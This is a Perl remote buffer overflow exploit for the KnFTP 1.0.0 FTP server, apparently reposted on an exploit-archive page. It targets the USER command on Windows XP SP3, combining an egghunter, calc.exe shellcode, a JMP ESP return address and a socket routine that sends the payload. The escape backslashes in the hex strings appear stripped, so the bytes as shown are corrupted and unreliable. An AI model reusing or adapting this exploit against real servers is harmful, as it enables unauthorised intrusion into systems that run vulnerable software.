Home / exploitsPDF  

KnFTP 1.0.0 USER Buffer Overflow

Posted on 19 September 2011

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command.
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]

print "
#----[ mr.pr0n ]---------------------------------------------------------#
";
print "#    Target App: KnFTP  1.0.0 Server                                     #
";
print "#    Attack    : Remote Buffer Overflow Exploit - 'USER' command         #
";
print "#    Target OS : Windows XP Pro English [Service Pack 3].                #
";
print "#------------------------------[ http://ghostinthelab.wordpress.com ]----#
";

$target 	= "192.168.178.21";

# The egghunter.
$egghunter 	=
"x66x81xCAxFFx0Fx42x52x6Ax02".
"x58xCDx2Ex3Cx05x5Ax74xEFxB8".
"w00t". # <-- The 4 byte tag
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7";

# Calc.exe
$shellcode =
"xb8xe8xaax5exc0xdbxd6xd9x74x24xf4x5bx31xc9xb1".
"x33x31x43x12x03x43x12x83x03x56xbcx35x2fx4fxc8".
"xb6xcfx90xabx3fx2axa1xf9x24x3fx90xcdx2fx6dx19".
"xa5x62x85xaaxcbxaaxaax1bx61x8dx85x9cx47x11x49".
"x5exc9xedx93xb3x29xcfx5cxc6x28x08x80x29x78xc1".
"xcfx98x6dx66x8dx20x8fxa8x9ax19xf7xcdx5cxedx4d".
"xcfx8cx5exd9x87x34xd4x85x37x45x39xd6x04x0cx36".
"x2dxfex8fx9ex7fxffxbexdex2cx3ex0fxd3x2dx06xb7".
"x0cx58x7cxc4xb1x5bx47xb7x6dxe9x5ax1fxe5x49xbf".
"x9ex2ax0fx34xacx87x5bx12xb0x16x8fx28xccx93x2e".
"xffx45xe7x14xdbx0exb3x35x7axeax12x49x9cx52xca".
"xefxd6x70x1fx89xb4x1exdex1bxc3x67xe0x23xccxc7".
"x89x12x47x88xcexaax82xedx21xe1x8fx47xaaxacx45".
"xdaxb7x4exb0x18xcexccx31xe0x35xccx33xe5x72x4a".
"xafx97xebx3fxcfx04x0bx6axacxcbx9fxf6x1dx6ex18".
"x9cx61";

$junk      	= "x41" x (284 - length("w00tw00t") - length($shellcode));

$eip		= "x13x44x87x7c";    	# 7C874413 JMP ESP - kernel32.dll
$padding 	= "x90" x 15; 			# Send 10 nops.

$payload	= $junk."w00tw00t".$shellcode.$eip.$padding.$egghunter;

if ($socket = IO::Socket::INET->new (PeerAddr => $target,PeerPort => "21",Proto => "TCP"))
{
print "
[*] Sending buffer (".(length($payload))." bytes) to: $target! 
";
print $socket "USER ".$payload. "
";
print $socket "PASS pwned 
";
sleep(1);
close($socket);
print "[+] OK, exploitation Done!
";
}

else
{
print "
[-] Connection to $target failed!
";
}

 

TOP

Malware :

Exploits :